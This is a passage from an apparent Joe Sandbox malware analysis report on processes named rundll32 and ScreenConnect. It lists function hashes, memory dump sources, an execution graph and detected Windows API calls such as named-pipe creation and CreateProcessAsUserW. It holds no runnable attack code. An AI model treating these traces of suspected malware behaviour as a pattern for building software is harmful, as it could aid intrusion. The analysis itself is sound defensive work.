                                                                                    • Instruction ID: 5793bf8ebc8217fec6fa8995867b70cf102bbe89ced25453a6ee8dee87e42dcc
                                                                                    • Opcode Fuzzy Hash: bf9cc458a33338341213e6e6a00776d68131c1cf422f3cc3947fb0e28255b89d
                                                                                    • Instruction Fuzzy Hash: C001D23170020487EB18AA69C8557EFBBB69FC8654F20906DD50AAB780CE755D068BD2
                                                                                    Function 043B182A Relevance: .0, Instructions: 47COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000003.1691683619.00000000043B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_3_43b0000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 46178b27de567480e6b11eff9ca44caf4c456cfb8209447c5148d99515bbbbf7
                                                                                    • Instruction ID: 97a41259ab631698e7ed71c4d32730ec991ece6dbb6a06c528f3ad3d41773bdf
                                                                                    • Opcode Fuzzy Hash: 46178b27de567480e6b11eff9ca44caf4c456cfb8209447c5148d99515bbbbf7
                                                                                    • Instruction Fuzzy Hash: B601A231B0061597EB18AA6884657EF7BF6AFC9744F115069C282F7B91CE761C0287D1
                                                                                    Function 0268D01D Relevance: .0, Instructions: 45COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1694291737.000000000268D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0268D000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_268d000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 118c9cdc53c163f7e4b379113f98724e2086a37ba8ae3653b1bd64a353821144
                                                                                    • Instruction ID: e052714eea9ae76ec7d2628eee0d541168e3d745bb5460258bf719d37de59c48
                                                                                    • Opcode Fuzzy Hash: 118c9cdc53c163f7e4b379113f98724e2086a37ba8ae3653b1bd64a353821144
                                                                                    • Instruction Fuzzy Hash: D8012B71408384AAE720AE36CCC4B77BF98DF51324F08C61AED494F2C2C7799842C6B1
                                                                                    Function 043B6A30 Relevance: .0, Instructions: 45COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000003.1691683619.00000000043B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_3_43b0000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 2ac5a9176aad49e0e546c7a274fa1c1d480a80962e784e15ab601b7f7ea841e8
                                                                                    • Instruction ID: 1fe494d7de3988ea8c4bdafea53db939b03021327c4711f893d82c1da1944641
                                                                                    • Opcode Fuzzy Hash: 2ac5a9176aad49e0e546c7a274fa1c1d480a80962e784e15ab601b7f7ea841e8
                                                                                    • Instruction Fuzzy Hash: 8701DF3170020487EF18AA6AC8157EFBAF69FC8754F24906DD206B7781CE756D018BD1
                                                                                    Function 0268D006 Relevance: .0, Instructions: 43COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1694291737.000000000268D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0268D000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_268d000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 5cd6bb6947e0e444321f4d9b0028cd0761b8a20c47b98aa36a4d37cbfd4c7ec0
                                                                                    • Instruction ID: 6a3fba974620aebcdcacb04467b209ac18ef0a5ce5e9ef741276fc4672d93831
                                                                                    • Opcode Fuzzy Hash: 5cd6bb6947e0e444321f4d9b0028cd0761b8a20c47b98aa36a4d37cbfd4c7ec0
                                                                                    • Instruction Fuzzy Hash: 1401526244E3C05ED7128B258C94B62BFA4DF52224F1981CBE9888F2D3C2695845C772
                                                                                    Function 043B9340 Relevance: .0, Instructions: 41COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000003.1691683619.00000000043B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_3_43b0000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 0678ad69666ff4c086aab64b9d8fcebb7c38bd1eff59a0edc1ab87c384ac8431
                                                                                    • Instruction ID: d5c4c2da64f24f9dd0c1ba9755e5e1411df5a88e7cf7bdabbb0d405e0c4e2722
                                                                                    • Opcode Fuzzy Hash: 0678ad69666ff4c086aab64b9d8fcebb7c38bd1eff59a0edc1ab87c384ac8431
                                                                                    • Instruction Fuzzy Hash: 8DF059B630931007D728891268C0BFF6B5EEFC4654B04806EDF8D87EA1DA28E90697E1
                                                                                    Function 043B1431 Relevance: .0, Instructions: 36COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000003.1691683619.00000000043B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_3_43b0000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 5ad3049d15d139c13d3a383b97b3fc2b7a62012ca58849b5bc2e01fb7f2a1956
                                                                                    • Instruction ID: 1932a28969be38e355a54a43e129025812bcabd09c2e2576a289d8111d220bf1
                                                                                    • Opcode Fuzzy Hash: 5ad3049d15d139c13d3a383b97b3fc2b7a62012ca58849b5bc2e01fb7f2a1956
                                                                                    • Instruction Fuzzy Hash: AFF046B0A052065FDF0C4F7860B62A63FAAEFC9340304286EC689CF941F9249808C7C1
                                                                                    Function 043B2EFA Relevance: .0, Instructions: 34COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000003.1691683619.00000000043B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_3_43b0000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 5c408eda62875ab4e688584a54b22d6b4647e318db092ce742991d884dd79e81
                                                                                    • Instruction ID: ba57e9002ab1f276f6ff633257bd5acd6b143a06248cb0e2714d8b97cd39bb9c
                                                                                    • Opcode Fuzzy Hash: 5c408eda62875ab4e688584a54b22d6b4647e318db092ce742991d884dd79e81
                                                                                    • Instruction Fuzzy Hash: 19F02B1171821807FB24256069483E70F884FC2698F0016F7DAD9C7F83E4C4E88313D3
                                                                                    Function 043B7FC0 Relevance: .0, Instructions: 34COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000003.1691683619.00000000043B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_3_43b0000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: b04b5fc9d48cefc6a44494b74b644f835d251d61f5268b42e6dbc8162368036f
                                                                                    • Instruction ID: 9155dcad944a7200932d1a28a12a920d90c2c0bf3ee94de6fcc0aaf81cdaf65f
                                                                                    • Opcode Fuzzy Hash: b04b5fc9d48cefc6a44494b74b644f835d251d61f5268b42e6dbc8162368036f
                                                                                    • Instruction Fuzzy Hash: 1EF0A731300210578325AA6EEC90ADBBBEADFC86643008539F64ACB700EF75EC054BE1
                                                                                    Function 043B5278 Relevance: .0, Instructions: 33COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000003.1691683619.00000000043B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_3_43b0000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: cf09953f83974b0786b3a9deb6d91d2dc8d7b2d4315df13e0731b642886c03bc
                                                                                    • Instruction ID: 9947d3b1a357ad4b00af69b95f7e3898410128c430ecd5948f1652aa3c174750
                                                                                    • Opcode Fuzzy Hash: cf09953f83974b0786b3a9deb6d91d2dc8d7b2d4315df13e0731b642886c03bc
                                                                                    • Instruction Fuzzy Hash: 6DF02B327092401FD3095A29E8507C6BF66DBD6234F2540BEE649C7356DD79CC07CB51
                                                                                    Function 043B7F3F Relevance: .0, Instructions: 27COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000003.1691683619.00000000043B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_3_43b0000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: de7edd467accb576a07e5543a9cc26ae1a3fc431e2494aaeb889d940086bf93a
                                                                                    • Instruction ID: aba1f475c8d9ccabfed041491681f8a404f7f147832b4893d5ddc83f8987bd2a
                                                                                    • Opcode Fuzzy Hash: de7edd467accb576a07e5543a9cc26ae1a3fc431e2494aaeb889d940086bf93a
                                                                                    • Instruction Fuzzy Hash: E4E0D870901208AFCF04DFA8D9826CD7BF5DB456187004694D80ADB202EE34BE0B6791
                                                                                    Function 043B5288 Relevance: .0, Instructions: 25COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000003.1691683619.00000000043B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_3_43b0000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 4211182b86c061d62de7c24d38b9ada469fc47e804c6f04e7d67c01da5a690d5
                                                                                    • Instruction ID: 5a86ae0bb05acfd5fcc220bc33922b293e501c2cbdcd45791dae8ea88cf90dc8
                                                                                    • Opcode Fuzzy Hash: 4211182b86c061d62de7c24d38b9ada469fc47e804c6f04e7d67c01da5a690d5
                                                                                    • Instruction Fuzzy Hash: 45E086327142045BD318A92AE850A97F79EDBC9625B50447DE50CC7359DE72DC428690
                                                                                    Function 043B2F80 Relevance: .0, Instructions: 22COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000003.1691683619.00000000043B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_3_43b0000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 4d24c673bb6a36138619c10653af3b867f7c5169b6b7bd7cbcefb49a582ff0dc
                                                                                    • Instruction ID: 867e376256fd67cdf5a82ad9e5b213886255ae0758d65ee085fd2c06d3f0cdd7
                                                                                    • Opcode Fuzzy Hash: 4d24c673bb6a36138619c10653af3b867f7c5169b6b7bd7cbcefb49a582ff0dc
                                                                                    • Instruction Fuzzy Hash: 2DD05E6BE1522457CB051A6020893EB6758CB95064F01ADE3EF998BA06A8289C4303D5
                                                                                    Function 043B17F0 Relevance: .0, Instructions: 20COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000003.1691683619.00000000043B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_3_43b0000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: f7d34478ab3c66dd472333d4dfae46d2ee86fc67a53f23f1df45417b5901e15c
                                                                                    • Instruction ID: 43697dddb290641117dcaa8f7fc1f11b1475e741f1fa063c545ae3f16f654406
                                                                                    • Opcode Fuzzy Hash: f7d34478ab3c66dd472333d4dfae46d2ee86fc67a53f23f1df45417b5901e15c
                                                                                    • Instruction Fuzzy Hash: F4D05B323592941FC30AA764F4565E67FB59F4A16130841ABE9858F666CD611C92C3C1
                                                                                    Function 043B2958 Relevance: .0, Instructions: 20COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000003.1691683619.00000000043B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_3_43b0000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 2f4dde271f8554f3a70f83a9806b61e98b70569e4d8902810ce8228328ee63f8
                                                                                    • Instruction ID: 7c717bc91faa182835616246793bacbd00a49d20becf96c3db54de86ceac7caa
                                                                                    • Opcode Fuzzy Hash: 2f4dde271f8554f3a70f83a9806b61e98b70569e4d8902810ce8228328ee63f8
                                                                                    • Instruction Fuzzy Hash: 52E0DFB1D061489FCB00DFA0E90219C7FB0DB45204B0045EAE909DB202EA354F218782
                                                                                    Function 043B0C0C Relevance: .0, Instructions: 17COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000003.1691683619.00000000043B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_3_43b0000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 763b7871b2d21ffeccfe47ebafcf1ed9e2e27d94a195d6a1fe80b13322a633ac
                                                                                    • Instruction ID: 94d1ba93575bf3f22a7b33eb03cf5a7b69839e609df20841e503bd349c936714
                                                                                    • Opcode Fuzzy Hash: 763b7871b2d21ffeccfe47ebafcf1ed9e2e27d94a195d6a1fe80b13322a633ac
                                                                                    • Instruction Fuzzy Hash: 0ED0A7363201186B56086619D8A9AEA7BA9EB893A13505423FA8187A10DE717C4083D6
                                                                                    Function 043B7F50 Relevance: .0, Instructions: 16COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000003.1691683619.00000000043B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_3_43b0000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 9acd6f974f3cc0b76dadeae1a9c8a1c028f84554a08cf3296fa282df0d2c5833
                                                                                    • Instruction ID: 81c54eb85915cf8a9690ac9be5dc8cac4e00acec217762816269c76c1b705f4d
                                                                                    • Opcode Fuzzy Hash: 9acd6f974f3cc0b76dadeae1a9c8a1c028f84554a08cf3296fa282df0d2c5833
                                                                                    • Instruction Fuzzy Hash: 61D01270A01108EB8B44DFA9D90155D77B6DB48214B1046A8D409D7210EE316E049B91
                                                                                    Function 043B2968 Relevance: .0, Instructions: 16COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000003.1691683619.00000000043B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_3_43b0000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: a6e43c06f7b581db907982a71fdcaf451ac3a06f9cab0c3d8fb3a9eb75cd6835
                                                                                    • Instruction ID: 1c36169d6eda11a3ad36a41897b245a8efb4b5c548a566beb4473d4f887e52c2
                                                                                    • Opcode Fuzzy Hash: a6e43c06f7b581db907982a71fdcaf451ac3a06f9cab0c3d8fb3a9eb75cd6835
                                                                                    • Instruction Fuzzy Hash: 25D05B7090110DEFCB00DFB5DA0255DBBF5DF44204B5085D9E509D7301EA316F009B91
                                                                                    Function 043B0440 Relevance: .0, Instructions: 15COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000003.1691683619.00000000043B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_3_43b0000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: fbe3c64f3f2837da272a0f0335765c4240c0f9db67f675509b888f7ffccb741d
                                                                                    • Instruction ID: 34c3ac12fe72e661fec4aed3292b3c065d1605d3467ae8a77563397912cf223d
                                                                                    • Opcode Fuzzy Hash: fbe3c64f3f2837da272a0f0335765c4240c0f9db67f675509b888f7ffccb741d
                                                                                    • Instruction Fuzzy Hash: 9BD080F77147415FE306090C04511DD77B0FFB3309385D592C5C04C803A1251053C521

                                                                                    Execution Graph

                                                                                    Execution Coverage:11.4%
                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                    Signature Coverage:2.4%
                                                                                    Total number of Nodes:210
                                                                                    Total number of Limit Nodes:17
                                                                                    execution_graph 34500 4614c00 34501 4614c1c 34500->34501 34502 4614c3a 34500->34502 34501->34502 34504 4615508 34501->34504 34505 4615537 34504->34505 34506 46157eb 34505->34506 34509 4617150 34505->34509 34513 4617143 34505->34513 34510 4617178 34509->34510 34511 46171ae 34510->34511 34512 17bfa98 2 API calls 34510->34512 34511->34506 34512->34511 34514 4617178 34513->34514 34515 46171ae 34514->34515 34516 17bfa98 2 API calls 34514->34516 34515->34506 34516->34515 34286 5cb5b88 34287 5cb5bca 34286->34287 34288 5cb5bd0 WaitNamedPipeW 34286->34288 34287->34288 34289 5cb5c04 34288->34289 34290 17b1238 34291 17b1239 34290->34291 34294 17b0e24 34291->34294 34296 17b0e2d 34294->34296 34295 17b0e56 34296->34295 34300 17b36b0 34296->34300 34307 17b36a0 34296->34307 34297 17b1282 34301 17b36b1 34300->34301 34314 17b4c63 34301->34314 34302 17b3764 34302->34297 34303 17b36cc 34303->34302 34319 17be5c7 34303->34319 34304 17b3739 34304->34297 34308 17b36a3 34307->34308 34312 17b4c63 RtlGetVersion 34308->34312 34309 17b3764 34309->34297 34310 17b3739 34310->34297 34311 17b36cc 34311->34309 34313 17be5c7 2 API calls 34311->34313 34312->34311 34313->34310 34315 17b4c70 34314->34315 34316 17b4d1d RtlGetVersion 34315->34316 34318 17b4cc6 34315->34318 34317 17b4dda 34316->34317 34317->34303 34318->34303 34320 17be5f4 34319->34320 34321 17be60e 34319->34321 34320->34321 34324 17bea88 34320->34324 34328 17bea77 34320->34328 34321->34304 34325 17beaae 34324->34325 34326 17beae6 34325->34326 34332 17beb31 34325->34332 34326->34321 34330 17beaae 34328->34330 34329 17beae6 34329->34321 34330->34329 34331 17beb31 2 API calls 34330->34331 34331->34329 34333 17beb6e 34332->34333 34340 17bf768 34333->34340 34334 17bee0f 34335 17bed97 34335->34334 34344 4610890 34335->34344 34348 4610948 34335->34348 34352 46108c0 34335->34352 34341 17bf78c 34340->34341 34342 17bf793 34340->34342 34341->34342 34356 17bf910 34341->34356 34342->34335 34346 461089b 34344->34346 34345 4610985 34345->34335 34346->34345 34347 4610448 2 API calls 34346->34347 34347->34345 34349 461096d 34348->34349 34350 4610448 2 API calls 34349->34350 34351 4610985 34350->34351 34351->34335 34353 46108cb 34352->34353 34354 4610448 2 API calls 34353->34354 34355 4610985 34353->34355 34354->34355 34355->34335 34357 17bf933 34356->34357 34359 17bf943 34356->34359 34358 17bf93c 34357->34358 34367 46147e0 2 API calls 34357->34367 34368 46147f0 2 API calls 34357->34368 34369 4614772 2 API calls 34357->34369 34358->34342 34359->34357 34366 17bf910 2 API calls 34359->34366 34370 46147e0 34359->34370 34376 46147f0 34359->34376 34382 17bfa98 34359->34382 34389 17ba4b8 34359->34389 34395 4614772 34359->34395 34402 17ba4c8 34359->34402 34366->34357 34367->34357 34368->34357 34369->34357 34371 4614824 34370->34371 34372 4614814 34370->34372 34375 17bf910 2 API calls 34371->34375 34373 461481d 34372->34373 34408 4616630 34372->34408 34373->34357 34375->34372 34377 4614814 34376->34377 34379 4614824 34376->34379 34378 461481d 34377->34378 34381 4616630 2 API calls 34377->34381 34378->34357 34380 17bf910 2 API calls 34379->34380 34380->34377 34381->34378 34383 17bfabb 34382->34383 34384 17bfacb 34382->34384 34385 17bfac4 34383->34385 34416 17bff20 34383->34416 34384->34383 34386 17bfa98 2 API calls 34384->34386 34387 17bf910 2 API calls 34384->34387 34385->34357 34386->34383 34387->34383 34390 17ba4c8 34389->34390 34391 17ba4ed 34390->34391 34392 46147e0 2 API calls 34390->34392 34393 46147f0 2 API calls 34390->34393 34394 4614772 2 API calls 34390->34394 34391->34357 34392->34391 34393->34391 34394->34391 34396 46147dd 34395->34396 34398 461477b 34395->34398 34397 4614814 34396->34397 34400 17bf910 2 API calls 34396->34400 34399 461481d 34397->34399 34401 4616630 2 API calls 34397->34401 34398->34357 34399->34357 34400->34397 34401->34399 34403 17ba4f9 34402->34403 34404 17ba4ed 34402->34404 34403->34404 34405 46147e0 2 API calls 34403->34405 34406 46147f0 2 API calls 34403->34406 34407 4614772 2 API calls 34403->34407 34404->34357 34405->34404 34406->34404 34407->34404 34409 4616670 34408->34409 34412 4610448 34409->34412 34411 461668b 34411->34373 34413 461046e 34412->34413 34414 5cb1048 CreateNamedPipeW CreateNamedPipeW 34412->34414 34415 5cb1058 CreateNamedPipeW CreateNamedPipeW 34412->34415 34413->34411 34414->34413 34415->34413 34417 17bff3f 34416->34417 34419 4610448 2 API calls 34417->34419 34421 4610438 34417->34421 34418 17bffb1 34418->34385 34419->34418 34422 461043b 34421->34422 34424 461049b 34421->34424 34423 4610443 34422->34423 34422->34424 34425 461046e 34423->34425 34428 5cb1048 CreateNamedPipeW CreateNamedPipeW 34423->34428 34429 5cb1058 CreateNamedPipeW CreateNamedPipeW 34423->34429 34424->34425 34426 46167a0 CreateNamedPipeW CreateNamedPipeW 34424->34426 34427 4616752 CreateNamedPipeW CreateNamedPipeW 34424->34427 34425->34418 34426->34425 34427->34425 34428->34425 34429->34425 34430 6062b40 34431 6062b9a 34430->34431 34432 6062bf9 RegDisablePredefinedCache 34431->34432 34433 6062bdc 34431->34433 34432->34433 34433->34433 34434 4615e68 34436 4615e6d 34434->34436 34435 4615e8c 34437 4615e95 34435->34437 34440 4616498 2 API calls 34435->34440 34441 461642d 2 API calls 34435->34441 34436->34435 34442 4616498 34436->34442 34448 461642d 34436->34448 34440->34435 34441->34435 34443 46164cb 34442->34443 34445 46164bb 34442->34445 34446 17bf910 2 API calls 34443->34446 34444 46164c4 34444->34435 34445->34444 34447 17bf910 2 API calls 34445->34447 34446->34445 34447->34445 34449 461643d 34448->34449 34451 46164bb 34449->34451 34452 17bf910 2 API calls 34449->34452 34450 46164c4 34450->34435 34451->34450 34453 17bf910 2 API calls 34451->34453 34452->34451 34453->34451 34517 5cb2d61 34519 5cb2d9b 34517->34519 34518 5cb31e0 34519->34518 34522 17b7481 34519->34522 34526 17b7490 34519->34526 34523 17b74ba 34522->34523 34524 17b74d5 34523->34524 34525 17bf910 2 API calls 34523->34525 34524->34519 34525->34524 34527 17b74ba 34526->34527 34528 17b74d5 34527->34528 34529 17bf910 2 API calls 34527->34529 34528->34519 34529->34528 34454 5cb59c0 34455 5cb59c1 34454->34455 34457 5cb59f7 34455->34457 34460 5cb5b10 34455->34460 34459 5cb5b10 2 API calls 34459->34457 34461 5cb5b2d 34460->34461 34467 6060380 34461->34467 34472 60603c5 34461->34472 34480 606036f 34461->34480 34485 60602f1 34461->34485 34462 5cb5a20 34462->34459 34468 6060393 34467->34468 34470 60603c5 2 API calls 34468->34470 34492 60603d0 34468->34492 34469 60603b8 34469->34462 34470->34469 34473 60603cf CreateFileA 34472->34473 34474 606039c 34472->34474 34477 6060505 34473->34477 34478 60603c5 CreateFileA 34474->34478 34479 60603d0 CreateFileA 34474->34479 34475 60603b8 34475->34462 34478->34475 34479->34475 34481 6060393 34480->34481 34483 60603c5 2 API calls 34481->34483 34484 60603d0 CreateFileA 34481->34484 34482 60603b8 34482->34462 34483->34482 34484->34482 34486 60602fa 34485->34486 34487 6060309 34485->34487 34488 60602fe 34486->34488 34490 60603c5 2 API calls 34486->34490 34491 60603d0 CreateFileA 34486->34491 34487->34462 34488->34462 34489 60603b8 34489->34462 34490->34489 34491->34489 34493 606042e CreateFileA 34492->34493 34495 6060505 34493->34495 34496 5cb1e50 34497 5cb1e68 ConnectNamedPipe 34496->34497 34499 5cb1ee0 34497->34499 34499->34499 34534 5cb01f0 34535 5cb0243 CreateProcessAsUserW 34534->34535 34537 5cb02d4 34535->34537 34530 5cb0ca4 34531 5cb0838 34530->34531 34532 5cb08c5 34531->34532 34533 4616630 2 API calls 34531->34533 34533->34532

                                                                                    Executed Functions

                                                                                    Function 017B4C63 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 109COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 0 17b4c63-17b4c6e 1 17b4c71-17b4cb3 0->1 2 17b4c70 0->2 7 17b4d02-17b4d08 1->7 8 17b4cb5-17b4cc4 call 17b4848 1->8 2->1 11 17b4d09-17b4dd8 RtlGetVersion 8->11 12 17b4cc6-17b4ccb 8->12 17 17b4dda-17b4de0 11->17 18 17b4de1-17b4e24 11->18 24 17b4cce call 17b52f8 12->24 25 17b4cce call 17b52e8 12->25 13 17b4cd4 13->7 17->18 22 17b4e2b-17b4e32 18->22 23 17b4e26 18->23 23->22 24->13 25->13
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3519752168.00000000017B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_17b0000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: `Qtq$`Qtq$s4h$s4h
                                                                                    • API String ID: 0-2594444996
                                                                                    • Opcode ID: d075dc8dc9694770e44c0b7ff371f7f2a002c05d2a07690725b648c19671f70b
                                                                                    • Instruction ID: 7d950c73d74edb4ab92447fd377f73ed1054dc161adfdb68c38dcd540072ad1d
                                                                                    • Opcode Fuzzy Hash: d075dc8dc9694770e44c0b7ff371f7f2a002c05d2a07690725b648c19671f70b
                                                                                    • Instruction Fuzzy Hash: F841CD70A043689FDF619F68C8587ADFBB5FB44310F0080E9D60AA7291DB744988CF92
                                                                                    Function 05CB17B8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 69pipeCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 331 5cb17b8-5cb17fa 332 5cb17fc-5cb17ff 331->332 333 5cb1802-5cb1867 CreateNamedPipeW 331->333 332->333 335 5cb1869-5cb186f 333->335 336 5cb1870-5cb1891 333->336 335->336
                                                                                    APIs
                                                                                    • CreateNamedPipeW.KERNEL32(00000000,?,?,?,?,?,00000001,00000004), ref: 05CB1854
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3549234909.0000000005CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CB0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_5cb0000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateNamedPipe
                                                                                    • String ID: 4Ltq$s4h
                                                                                    • API String ID: 2489174969-3527615514
                                                                                    • Opcode ID: 68ea63e3695c967a8c61535875a368492baf38356fe1e315c85aed436c5def8f
                                                                                    • Instruction ID: 59c2171b376e90d8fa796b53bffdbe8a088d15ee14a58878211a843639d73f03
                                                                                    • Opcode Fuzzy Hash: 68ea63e3695c967a8c61535875a368492baf38356fe1e315c85aed436c5def8f
                                                                                    • Instruction Fuzzy Hash: 4C3103B5800248DFDB10CF9AD484A8EBFF5FF48314F19C469E919AB221C376A955CF51
                                                                                    Function 05CB01F0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 93processCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
